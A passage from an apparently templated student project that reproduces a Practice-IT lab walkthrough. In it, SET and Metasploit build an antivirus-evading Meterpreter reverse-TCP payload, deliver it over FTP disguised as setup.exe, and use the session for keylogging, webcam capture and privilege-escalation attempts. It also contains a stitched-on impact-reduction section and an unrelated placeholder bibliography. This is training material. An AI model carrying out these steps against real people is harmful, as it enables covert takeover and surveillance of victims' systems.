 Exercise 1 - Use the Social Engineering Toolkit (SET) in Kali Linux
 Summary

 Introduction
The Conduct a Social Engineering Attack module provides you with the instructions and devices to
develop your hands-on skills in the following topics.

 Use Social Engineering Toolkit (SET) in Kali Linux

Lab time: It will take approximately 1 hour to complete this lab.

 Objectives

The following objectives are covered in this lab.

 Social Engineering
 Lab Diagram

During your session, you will have access to the following lab configuration. Depending on the
exercises you may or may not use all the devices, but they are shown here in the layout to get an overall
understanding of the topology of the lab.

Projektni zadatak: Naziv projektnog zadatka229


Ime i prezime, br.index
CS450 – Cloud Computing

 Connecting to your lab

In this module, you will be working on the following equipment to carry out the steps defined in each
exercise.

 PLABDC01 (Windows Server 2012 R2 - Domain Controller)


 PLABDM01 (Windows Server 2012 R2 - Member Server)
 PLABKALI01 (Kali 2016.2)
 PLABWIN10 (Windows 10 - Domain Member)
 PLABWIN801 (Windows 8.1 - Domain Member)

To start, simply choose a device and click Power on. In some cases, the devices may power on
automatically.

For further information and technical support, please see our Help and Support page. Copyright Notice
This document and its content is copyright of Practice-IT - © Practice-IT 2017. All rights reserved.
Any redistribution or reproduction of part or all the contents in any form is prohibited other than the
following:
1. You may print or download to a local hard disk extracts for your personal and non-commercial use
only.
2. You may copy the content to individual third parties for their personal use, but only if you
acknowledge the website as the source of the material. You may not, except with our express written

Projektni zadatak: Naziv projektnog zadatka230


Ime i prezime, br.index
CS450 – Cloud Computing

permission, distribute or commercially exploit the content. Nor may you transmit it or store it in any
other website or other form of electronic retrieval system.

Projektni zadatak: Naziv projektnog zadatka231


Ime i prezime, br.index
CS450 – Cloud Computing

6.3 EXERCISE 1 - USE THE SOCIAL ENGINEERING TOOLKIT (SET) IN


KALI LINUX

With a little skillset, you can always break someone’s password using various methods, such as brute-
force or dictionary attack. However, it is much easier to trick someone to simply share the password
with you without them even knowing that they have shared it. You can also control their system
without letting them know but you should trick them to install something or open a file, which contains
a specific payload. When you perform such tricks with people, to share their confidential information
or run a malicious file or payload, you are performing a social engineering attack, which is an art of
manipulating people to perform a task that allows you to gain their confidential information or even
control their system.

Please refer to your course material or use your favorite search engine to research for more information
about this topic.

 Task 1 - Create an Exploit

You can perform social engineering using various methods, such as simply talking to the people and
tricking them or use sophisticated method with the help of the Social Engineering Toolkit (SET), which
is a python-driven suite of custom tools that focus on attacking the human element.

Important: SET provides many tools. In this task, you will focus on specific tools but in your spare
time, you are free to try all these tools to enhance your learning.

To use the SET, perform the following steps:

 Step 1

Ensure you have powered on the required devices and connect to PLABKALI01.

Type root in the Username field.

Projektni zadatak: Naziv projektnog zadatka232


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 1.1 Screenshot of PLABKALI01: Typing root into the username field on the login screen.

When prompted, type the following password in the Password field:

Projektni zadatak: Naziv projektnog zadatka233


Ime i prezime, br.index
CS450 – Cloud Computing

Passw0rd

Click Sign In.

Projektni zadatak: Naziv projektnog zadatka234


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 1.2 Screenshot of PLABKALI01: Entering the password in the Password text box and then
clicking Sign In.

Ensure that you have logged into the Kali Linux system.
Projektni zadatak: Naziv projektnog zadatka235
Ime i prezime, br.index
CS450 – Cloud Computing

Figure 1.3 Screenshot of PLABKALI01: Showing the taskbar that is correctly displayed once the
viewer has been moved.

 Step 2
Projektni zadatak: Naziv projektnog zadatka236
Ime i prezime, br.index
CS450 – Cloud Computing

You can start SET either from the menu or from the command prompt. To start from the menu, click
the first icon from the task bar, select Exploitation Tools, and then select social engineering toolkit.

In this lab, you will use a command to start SET. On the toolbar, double-click Root Terminal.

Projektni zadatak: Naziv projektnog zadatka237


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 1.4 Screenshot of PLABKALI01: Double-clicking the Root Terminal icon.

 Step 3

Projektni zadatak: Naziv projektnog zadatka238


Ime i prezime, br.index
CS450 – Cloud Computing

The terminal window is displayed. Enter the following command and press Enter:

setoolkit

Projektni zadatak: Naziv projektnog zadatka239


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 1.5 Screenshot of PLABKALI01: Executing the setoolkit command.

 Step 4

Projektni zadatak: Naziv projektnog zadatka240


Ime i prezime, br.index
CS450 – Cloud Computing

If you are using SET for the first time, you need to accept the terms of service. Type the following
letter and press Enter.

Projektni zadatak: Naziv projektnog zadatka241


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 1.6 Screenshot of PLABKALI01: Accepting the terms of service to start the Social Engineering
Toolkit (SET).

 Step 5
Projektni zadatak: Naziv projektnog zadatka242
Ime i prezime, br.index
CS450 – Cloud Computing

You are now on the main menu. You will notice that there are multiple options displayed. Each option
is designed to perform a specific task. For example, you can update the Social Engineering Toolkit by
selecting the option 5.

To continue with this lab, you will need to select the 1) Social-Engineering Attacks option. Type the
following number and press Enter:

Projektni zadatak: Naziv projektnog zadatka243


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 1.7 Screenshot of PLABKALI01: Selecting the option 1 to choose the Social-Engineering
Attacks.

 Step 6
Projektni zadatak: Naziv projektnog zadatka244
Ime i prezime, br.index
CS450 – Cloud Computing

Next, you will see another menu that relate to the Social-Engineering Attacks option. Out of the given
choices, you can choose 4) Create a Payload and Listener. Type the following number and press
Enter:

Projektni zadatak: Naziv projektnog zadatka245


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 1.8 Screenshot of PLABKALI01: Selecting the option 4 to create a payload and listener.

 Step 7

Projektni zadatak: Naziv projektnog zadatka246


Ime i prezime, br.index
CS450 – Cloud Computing

Next, you will be prompted to select an option. Out of the given choices, you can choose 5) Windows
Meterpreter Reverse_TCP X64. Type the following number and press Enter:

Projektni zadatak: Naziv projektnog zadatka247


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 1.9 Screenshot of PLABKALI01: Selecting the option 5 to choose Windows Meterpreter
Reverse payload.

 Step 8
Projektni zadatak: Naziv projektnog zadatka248
Ime i prezime, br.index
CS450 – Cloud Computing

You will be prompted to provide the IP address for the payload listener. This is the IP address for your
system, which is the Kali Linux. In this lab environment, the IP address for the Kali Linux is
192.168.0.3.

For the IP address for the payload listener option, enter the following IP address and press Enter:

192.168.0.3

Note: In the real environment, you will have a different IP address. You should not be using this IP
address as it is applicable only in this lab environment. If you do not know the IP address of your Kali
Linux, simply open another command prompt window, and run ifconfig. If you know the network
adapter name, then you can run ifconfig eth0, where eth0 is the name of the network adapter. You will
have to check your system.

Projektni zadatak: Naziv projektnog zadatka249


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 1.10 Screenshot of PLABKALI01: Entering the IP address of the Kali Linux for the payload
listener.

 Step 9
Projektni zadatak: Naziv projektnog zadatka250
Ime i prezime, br.index
CS450 – Cloud Computing

Next, you will be prompted to enter the port number. Type the following port number in the Enter the
PORT for the reverse listener option and press Enter:

443

Projektni zadatak: Naziv projektnog zadatka251


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 1.11 Screenshot of PLABKALI01: Entering the port number for the reverse listener.

 Step 10

Projektni zadatak: Naziv projektnog zadatka252


Ime i prezime, br.index
CS450 – Cloud Computing

Notice that the backdooring a legit executable process starts. An executable is now being packaged in a
manner that the antivirus cannot detect it. After the executable is created, it is stored in the /root/.set.
The default name for the file is payload.exe, which you will change after transporting it to the victim’s
system.

You are now prompted to start the payload and listener. Type the following and press Enter:

yes

Projektni zadatak: Naziv projektnog zadatka253


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 1.12 Screenshot of PLABKALI01: Entering YES to start the payload and listener.

The Metasploit framework now starts. You are now ready to move to the next level, which is sharing
the payload with the victim and then capturing the information when the victim executes the payload.
Projektni zadatak: Naziv projektnog zadatka254
Ime i prezime, br.index
CS450 – Cloud Computing

Note: To be able to complete the next set of tasks in this exercise, you need to keep this console window
open. Do NOT shut it down or exit from it.

You are now at the msf exploit (handler) prompt.

Projektni zadatak: Naziv projektnog zadatka255


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 1.13 Screenshot of PLABKALI01: Showing the successful start of the payload handler.

 Task 2 - Setup the FTP Server

Projektni zadatak: Naziv projektnog zadatka256


Ime i prezime, br.index
CS450 – Cloud Computing

After you have created the payload, you need to share it with the victim. In the real environment, you
will have different methods of transporting this payload to the victim’s system. For example, some of
the common transport methods are:

 E-mail - attach the payload with an E-mail and send it to the victim.
 USB - copy the payload in a USB and when the victim plugs-in the USB in the system, it can be
triggered.
 Download - keep the infected file in a download repository from where the victim downloads
the payload.
 FTP - Share it through FTP - making it look like a legitimate file.

In this task, you will setup an FTP server and share the file with the victim.

Important: SET provides many tools. In this task, you will focus on specific tools but in your spare
time, you are free to try all these tools to enhance your learning.

To setup the FTP server, perform the following steps:

 Step 1

Ensure that you have logged into the Kali Linux system and also ensure that the Metasploit window is
opened. Notice that the payload handler is in running state.

Projektni zadatak: Naziv projektnog zadatka257


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 1.14 Screenshot of PLABKALI01: Showing the successful start of the payload handler.

 Step 2

Projektni zadatak: Naziv projektnog zadatka258


Ime i prezime, br.index
CS450 – Cloud Computing

Next, you need to first setup an FTP server. There are multiple options. Either you can setup an
independent FTP server or use an auxiliary FTP server of the Metasploit. To setup the FTP server, type
the following command and press Enter:

use auxiliary/server/ftp

Projektni zadatak: Naziv projektnog zadatka259


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 1.15 Screenshot of PLABKALI01: Starting the auxiliary FTP server of the Metasploit.

 Step 3

Projektni zadatak: Naziv projektnog zadatka260


Ime i prezime, br.index
CS450 – Cloud Computing

Notice that the command prompt is now changed to msf auxiliary(ftp). You need to now set the FTP
root directory. To do this, type the following command and press Enter:

set FTPROOT /root/.set/

Projektni zadatak: Naziv projektnog zadatka261


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 1.16 Screenshot of PLABKALI01: Setting the FTPROOT directory of the FTP server.

 Step 4

Projektni zadatak: Naziv projektnog zadatka262


Ime i prezime, br.index
CS450 – Cloud Computing

Next, you need to type the following command and press Enter:

exploit

Note: If you miss this step, you will not be able to connect to the FTP server. This is a critical step.

Projektni zadatak: Naziv projektnog zadatka263


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 1.17 Screenshot of PLABKALI01: Initiating the auxiliary module execution.

 Step 5

Projektni zadatak: Naziv projektnog zadatka264


Ime i prezime, br.index
CS450 – Cloud Computing

Connect to PLABWIN10.

Note: Do not close the Metasploit window.

Figure 1.18 Screenshot of PLABWIN10: Showing the desktop screen of the Windows system.
Projektni zadatak: Naziv projektnog zadatka265
Ime i prezime, br.index
CS450 – Cloud Computing

Leave the devices you have powered on in their current state and proceed to the next task.

 Task 3 - Download the Payload

After you have setup the FTP server, you need to next download the file on the victim’s system. You
do not need an FTP client to download the file. In this task, you will use the Windows command
prompt to connect to the FTP server.

Note: In the real environment, you will probably not be the one who will be downloading the file on the
victim’s system. You will convince the victim to download the file. For the sake of completing this
exercise, you will download the file from the FTP server to the victim’s system.

To download the payload, perform the following steps:

 Step 1

Ensure that you have logged into PLABWIN10.

Projektni zadatak: Naziv projektnog zadatka266


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 1.19 Screenshot of PLABWIN10: Showing the desktop screen of the Windows system.

 Step 2

Projektni zadatak: Naziv projektnog zadatka267


Ime i prezime, br.index
CS450 – Cloud Computing

Right-click the Windows icon and select Run.

Figure 1.20 Screenshot of PLABWIN10: Selecting the Run options from the menu.

Projektni zadatak: Naziv projektnog zadatka268


Ime i prezime, br.index
CS450 – Cloud Computing

 Step 3

The Run dialog box is displayed. In the Open textbox, type the following and press Enter:

cmd

Alternatively, you can click OK.

Projektni zadatak: Naziv projektnog zadatka269


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 1.21 Screenshot of PLABWIN10: Showing the Run dialog box with the cmd command in the
Open textbox.

 Step 4
Projektni zadatak: Naziv projektnog zadatka270
Ime i prezime, br.index
CS450 – Cloud Computing

The command prompt window is displayed. You will now connect with the FTP server and download
the file.

To connect with the FTP server, type the following command and press Enter:

ftp 192.168.0.3

Projektni zadatak: Naziv projektnog zadatka271


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 1.22 Screenshot of PLABWIN10: Using the command prompt to connect with the FTP server
192.168.0.3.

 Step 5
Projektni zadatak: Naziv projektnog zadatka272
Ime i prezime, br.index
CS450 – Cloud Computing

You are now connected with the FTP server. You will now authenticate as the anonymous user. Type
the following name as the User and press Enter:

anonymous

Projektni zadatak: Naziv projektnog zadatka273


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 1.23 Screenshot of PLABWIN10: Entering the user name as Anonymous to connect with the
FTP server.

 Step 6
Projektni zadatak: Naziv projektnog zadatka274
Ime i prezime, br.index
CS450 – Cloud Computing

Next, you are prompted for the password. Leave it blank and press Enter.

Figure 1.24 Screenshot of PLABWIN10: Entering the password to authenticate the Anonymous user.

Projektni zadatak: Naziv projektnog zadatka275


Ime i prezime, br.index
CS450 – Cloud Computing

You are now successfully authenticated with the FTP server.

Figure 1.25 Screenshot of PLABWIN10: Showing the successful connection with the FTP server
192.168.0.3.
Projektni zadatak: Naziv projektnog zadatka276
Ime i prezime, br.index
CS450 – Cloud Computing

 Step 7

You need to now list the files on the FTP server. To be able to do this, type the following command
and press Enter:

dir

Notice that the payload.exe is present on the FTP server.

Projektni zadatak: Naziv projektnog zadatka277


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 1.26 Screenshot of PLABWIN10: Listing the files on the FTP server 192.168.0.3.

 Step 8

Projektni zadatak: Naziv projektnog zadatka278


Ime i prezime, br.index
CS450 – Cloud Computing

Now, set the transfer to binary. Type the following command and press Enter:

binary

Type is now set to binary.

Projektni zadatak: Naziv projektnog zadatka279


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 1.27 Screenshot of PLABWIN10: Setting the TYPE to binary.

 Step 9

Projektni zadatak: Naziv projektnog zadatka280


Ime i prezime, br.index
CS450 – Cloud Computing

Next, transfer the file on to the victim’s system. Type the following command and press Enter:

get payload.exe

Notice that the transfer is successful.

Projektni zadatak: Naziv projektnog zadatka281


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 1.28 Screenshot of PLABWIN10: Downloading the payload.exe file using the GET command.

 Step 10

Projektni zadatak: Naziv projektnog zadatka282


Ime i prezime, br.index
CS450 – Cloud Computing

You can now safely close the FTP server. Type the following command and press Enter:

quit

Notice that the FTP prompt is now longer available. You are back on the command prompt.

Projektni zadatak: Naziv projektnog zadatka283


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 1.29 Screenshot of PLABWIN10: Closing the session with the FTP server using the quit
command.

 Step 11
Projektni zadatak: Naziv projektnog zadatka284
Ime i prezime, br.index
CS450 – Cloud Computing

Open the Windows Explorer from the taskbar and navigate to the following path:

C:\Users\administrator.PRACTICELABS

Notice that the payload.exe file is present.

Projektni zadatak: Naziv projektnog zadatka285


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 1.30 Screenshot of PLABWIN10: Showing the successful download of the payload.exe on the
Windows system.

 Step 12
Projektni zadatak: Naziv projektnog zadatka286
Ime i prezime, br.index
CS450 – Cloud Computing

Move the file to the Downloads folder by dragging it. You should then see the file in the Downloads
folder.

Figure 1.31 Screenshot of PLABWIN10: Moving the file, payload.exe, to the Downloads folder.
Projektni zadatak: Naziv projektnog zadatka287
Ime i prezime, br.index
CS450 – Cloud Computing

 Step 13

Navigate to the Downloads folder. Notice that the payload.exe is now present in this folder.

Projektni zadatak: Naziv projektnog zadatka288


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 1.32 Screenshot of PLABWIN10: Showing the file, payload.exe, in the Downloads folder.

 Step 14

Projektni zadatak: Naziv projektnog zadatka289


Ime i prezime, br.index
CS450 – Cloud Computing

After the file is moved, rename the file to setup.exe. Then, double-click the file to execute it.

Figure 1.33 Screenshot of PLABWIN10: Renaming the file, payload.exe, to setup.exe.

Projektni zadatak: Naziv projektnog zadatka290


Ime i prezime, br.index
CS450 – Cloud Computing

Quickly, switch back to PLABKALI01. Notice that the connection with the victim’s system is already
opened.

Note: To be able to complete the next set of tasks in this exercise, you need to keep this console window
open. Do NOT shut it down or exit from it.

Projektni zadatak: Naziv projektnog zadatka291


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 1.34 Screenshot of PLABKALI01: Showing a successful connection with the victim’s system
after the payload.exe file is executed.

 Task 4 - Exploit the Victim’s System


Projektni zadatak: Naziv projektnog zadatka292
Ime i prezime, br.index
CS450 – Cloud Computing

The payload is now running on the victim’s system. You need to now exploit the victim’s system.

To exploit victim’s system, perform the following steps:

 Step 1

Ensure that you are connected to the PLABKALI01. You need to now open the session with the
victim’s system.

Type the following command and press Enter:

sessions -i 1

The session is now successfully established.

Projektni zadatak: Naziv projektnog zadatka293


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 1.35 Screenshot of PLABKALI01: Showing a successful connection with the victim’s system
after the payload.exe file is executed.

 Step 2
Projektni zadatak: Naziv projektnog zadatka294
Ime i prezime, br.index
CS450 – Cloud Computing

Notice the interaction with the victim’s system has now started. You are now virtually controlling the
victim’s system. Let’s see the processes that are running on the victim’s system.

Type the following command and press Enter:

ps

Notice that the processes running on the victim’s system are now displayed. It is important to note the
last running process, setup.exe, which is the payload that you have executed on the victim’s system.

Projektni zadatak: Naziv projektnog zadatka295


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 1.36 Screenshot of PLABKALI01: Listing the running processes on the victim’s system.

 Step 3

Projektni zadatak: Naziv projektnog zadatka296


Ime i prezime, br.index
CS450 – Cloud Computing

Next, you need to escalate privileges. Type the following command press Enter:

getsystem

Notice the result. It shows a failure of privileges escalation.

Projektni zadatak: Naziv projektnog zadatka297


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 1.37 Screenshot of PLABKALI01: Executing the getsystem command to escalate privileges on
the victim’s system.

 Step 4
Projektni zadatak: Naziv projektnog zadatka298
Ime i prezime, br.index
CS450 – Cloud Computing

Let’s now check if the victim’s system has a webcam and take a picture. To check this, enter the
following command and press Enter:

webcam_snap

Notice the output, which states that victim’s system does not have a webcam.

Projektni zadatak: Naziv projektnog zadatka299


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 1.38 Screenshot of PLABKALI01: Using the webcam on the victim’s system to take a picture.

 Step 5

Projektni zadatak: Naziv projektnog zadatka300


Ime i prezime, br.index
CS450 – Cloud Computing

Let’s try to capture the keystrokes on the victim’s system. Type the following command and press
Enter:

keyscan_start

Notice that the sniffer has now started.

Projektni zadatak: Naziv projektnog zadatka301


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 1.39 Screenshot of PLABKALI01: Starting the keystroke sniffer on the victim’s system.

 Step 6

Projektni zadatak: Naziv projektnog zadatka302


Ime i prezime, br.index
CS450 – Cloud Computing

Let’s now see the keys that have been pressed on the victim’s system. Type the following command
and press Enter:

keyscan_dump

Notice that several keys were pressed since the sniffer has started.

Projektni zadatak: Naziv projektnog zadatka303


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 1.40 Screenshot of PLABKALI01: Capturing the keystrokes on the victim’s system.

 Step 7

Projektni zadatak: Naziv projektnog zadatka304


Ime i prezime, br.index
CS450 – Cloud Computing

Since the privilege escalation failed, you can try to do something else with the system. First, let’s
background the session.

Type the following command and press Enter:

background

Notice that session 1 is now running in the background. Here, you can run more exploits if you desire.
There are a lot of options available and you can explore them in your free time.

Projektni zadatak: Naziv projektnog zadatka305


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 1.41 Screenshot of PLABKALI01: Putting the session into the background.
Shutdown all virtual machines used in this lab, before proceeding to the next module. Alternatively,
you can log out of the lab platform.

Projektni zadatak: Naziv projektnog zadatka306


Ime i prezime, br.index
CS450 – Cloud Computing

 Summary
You covered the following activities in this module:

 Use Social Engineering Toolkit (SET) in Kali Linux

Projektni zadatak: Naziv projektnog zadatka307


Ime i prezime, br.index
CS450 – Cloud Computing

7 WHAT IS IMPACT REDUCTION?


While the majority of successful companies today are aware of common security issues and put considerable
effort towards preventing them, no set of security practices is 100% efficient. Because a breach is likely to
happen if the prize is big, companies and organizations must also be prepared to contain the damage.

It is important to understand that the impact of a breach is not only related to the technical aspect of it, stolen
data, damaged databases, or damage to intellectual property, the damage also extends to the company’s
reputation. Responding to a data breach is a very dynamic process.

Below are some important measures a company should take when a security breach is identified, according to
many security experts:

Communicate the issue. Internally employees should be informed of the problem and called to action.
Externally, clients should be informed through direct communication and official announcements.
Communication creates transparency, which is crucial in this type of situation.

Be sincere and accountable in case the company is at fault.

Provide details. Explain why the situation took place and what was compromised. It is also expected that the
company take care of the costs of identity theft protection services for affected customers.

Understand what caused and facilitated the breach. If necessary, hire forensics experts to research and learn
the details.

Apply what was learned from the forensics investigation to ensure similar breaches do not happen in the
future.

Ensure all systems are clean, no backdoors were installed, and nothing else has been compromised.
Attackers will often attempt to leave a backdoor to facilitate future breaches. Make sure this does not happen.

Educate employees, partners, and customers on how to prevent future breaches.

Projektni zadatak: Naziv projektnog zadatka308


Ime i prezime, br.index
CS450 – Cloud Computing

8 ZAKLJUČAK
U zaključku se osvrnuti na svako poglavlje i napisati kratak rezime za njega kao i za kompletan rad.

Projektni zadatak: Naziv projektnog zadatka309


Ime i prezime, br.index
CS450 – Cloud Computing

9 LITERATURA
[1.] Banerjee, A. and Watson, T.F. (2011) Pickard’s manual of operative dentistry. 9th edn. Oxford: Oxford
University Press.
[2.] Davidson, A. (2013) ‘The Saudi Marathon Man’, The New Yorker, 16 April. Available at:
http://www.newyorker.com/news/daily-comment/the-saudi-marathon-man (Accessed: 22 June 2015).
[3.] Guy, J. (2001) The view across the river: Harriette Colenso and the Zulu struggle against imperialism.
Charlottesville, Virginia: University Press of Virginia.
[4.] Hislop, V. (2014) The sunrise. Available at http://www.amazon.co.uk/kindlestore (Downloaded: 17 June
2015).
[5.] Homer (1997) The Iliad. Translated by J. Davies. Introduction and notes by D. Wright. London: Dover
Publications.
[6.] Knapik, J. J., Cosio-Lima, L. M., and Reynolds, K. L. (2015) ‘Efficacy of functional movement screening for
predicting injuries in coast guard cadets’, The Journal of Strength and Conditioning Research, 29 (5), pp.
1157-1162. EDUC 1028: E-learning. Available at: http://intranet.bham.ac.uk (Accessed: 25 June 2015).
[7.] Lucas, G. (2004) The wonders of the Universe. 2nd edn. Edited by Frederick Jones, James Smith and
Tony Bradley. London: Smiths.
[8.] Medicine in old age (1985) 2nd edn. London: British Medical Association.
[9.] ‘Rush (band)’ (2015) Wikipedia. Available at https://en.wikipedia.org/?title=Rush_(band) (Accessed: 18
June 2015).

Projektni zadatak: Naziv projektnog zadatka310


Ime i prezime, br.index
CS450 – Cloud Computing

10 PRILOZI

Projektni zadatak: Naziv projektnog zadatka311


Ime i prezime, br.index
CS450 – Cloud Computing

10.1 PRILOG 1

Projektni zadatak: Naziv projektnog zadatka312


Ime i prezime, br.index
CS450 – Cloud Computing

10.2 PRILOG 2

Projektni zadatak: Naziv projektnog zadatka313

You might also like